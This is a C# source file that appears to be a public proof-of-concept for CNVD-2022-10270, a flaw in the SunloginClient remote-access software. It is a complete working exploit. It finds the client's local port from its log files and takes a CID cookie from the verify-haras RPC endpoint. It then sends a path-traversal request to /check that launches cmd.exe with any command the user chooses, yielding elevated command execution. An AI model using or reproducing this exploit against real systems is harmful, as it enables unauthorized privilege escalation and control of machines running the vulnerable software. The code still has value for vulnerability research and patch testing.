CNVD-2022-10270-LPE/sunloginLPE/Program.cs

using System;
using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Text.RegularExpressions;
using System.Net;

namespace sunloginLPE
{

    internal class Program
    {
        static string GetLatestFiles(string Path, int count)
        {
            var query = (from f in Directory.GetFiles(Path)
                         let fi = new FileInfo(f)
                         orderby fi.CreationTime descending
                         select fi.FullName).Take(count);
            string[] files = query.ToArray();
            for (int i = 0; i < files.Length; i++)
            {
                if (files[i].Contains("sunlogin_service."))
                {
                    return files[i];
                }
            }
            Console.WriteLine("[-] logFile not found");
            return "";
        }
        static string getPort(string path)
        {
            string logFile = GetLatestFiles(path + "\\log", 2);
            string port = "";
            string s;
            if (logFile != "")
            {
                FileStream fs = new FileStream(logFile, FileMode.Open, FileAccess.Read, FileShare.ReadWrite);
                StreamReader sr = new StreamReader(fs, System.Text.Encoding.Default);
                s  = sr.ReadToEnd();
                string pattern = @"\bstart listen OK\S*\,";
                string pattern2 = @"\d{5}";
                string res = "";
                MatchCollection mc = Regex.Matches(s, pattern);
                foreach (Match m in mc)
                    res = m.Value;
                MatchCollection mc2 = Regex.Matches(res, pattern2);
                foreach (Match m2 in mc2)
                    port = m2.Value;
            }
            return port;

        }

        private static String HttpGet(string url, string requestData)
        {
            // 实例化请求对象
            HttpWebRequest request = (HttpWebRequest)WebRequest.Create(url + "?" + requestData);
            request.Method = "GET";
            request.ContentType = "text/html; charset=UTF-8";

            // 实例化响应对象，获取响应信息
            HttpWebResponse response = (HttpWebResponse)request.GetResponse();
            Stream responseStream = response.GetResponseStream();
            StreamReader sReader = new StreamReader(responseStream, Encoding.Default);
            String result = sReader.ReadToEnd();
            sReader.Close();
            responseStream.Close();
            return result;
        }

        private static String HttpGetWithCookie(string url, string requestData,string cookie)
        {
            // 实例化请求对象
            HttpWebRequest request = (HttpWebRequest)WebRequest.Create(url + "?" + requestData);
            request.Method = "GET";
            request.ContentType = "text/html; charset=UTF-8";
            request.Headers.Add("Cookie", "CID=" + cookie);

            // 实例化响应对象，获取响应信息
            HttpWebResponse response = (HttpWebResponse)request.GetResponse();
            Stream responseStream = response.GetResponseStream();
            StreamReader sReader = new StreamReader(responseStream, Encoding.Default);
            String result = sReader.ReadToEnd();
            sReader.Close();
            responseStream.Close();
            return result;
        }
        static string exp(string SunloginClient_port,string ExecCmd)
        {
            String targetUrl = "http://127.0.0.1:" + SunloginClient_port + "/cgi-bin/rpc";
            String response = HttpGet(targetUrl, "action=verify-haras");
            string pattern = "verify_string\":\"(\\w+)?\"";
            string cid = "";
            MatchCollection mc = Regex.Matches(response, pattern);
            foreach (Match m in mc)
                cid = m.Value;
            cid = cid.Replace("\"", "").Replace("verify_string:", "");
            Console.WriteLine("[+] CID=" +cid);

            targetUrl = "http://127.0.0.1:" + SunloginClient_port + "/check";
            response = HttpGetWithCookie(targetUrl, "cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows\\system32\\cmd.exe+/c+" + ExecCmd.Replace(" ","+"),cid);

            return response;
        }
        static void Main(string[] args)
        {
            
            Console.WriteLine("[!] Usage: sunloginLPE.exe Cmd [sunloginClientPath]（DefaultPath = C:\\Program Files\\Oray\\SunLogin\\SunloginClient）");
            string defaultPath = "C:\\Program Files\\Oray\\SunLogin\\SunloginClient";
            string cmd = "";
            string path = defaultPath;
            string port = "";
            if(args.Length  == 1)
            {
                cmd = args[0];
            }
            else if(args.Length == 2)
            {
                cmd=args[0];
                path =args[1];
            }
            else
            {
                Console.WriteLine("[-] wrong number of parameters");
                System.Environment.Exit(0);
            }
            try
            {
                port = getPort(path);
                if(port != "")
                {
                    Console.WriteLine("[+] SunloginClient port is " + port);
                }
                else
                {
                    Console.WriteLine("[-] SunloginClient port not found");
                    System.Environment.Exit(0);
                }
                Console.WriteLine("[+] 命令执行结果: \n" + exp(port, cmd));
            }
            catch(Exception ex)
            {
                Console.WriteLine("[-] " + ex.ToString());
            }
        }
    }
}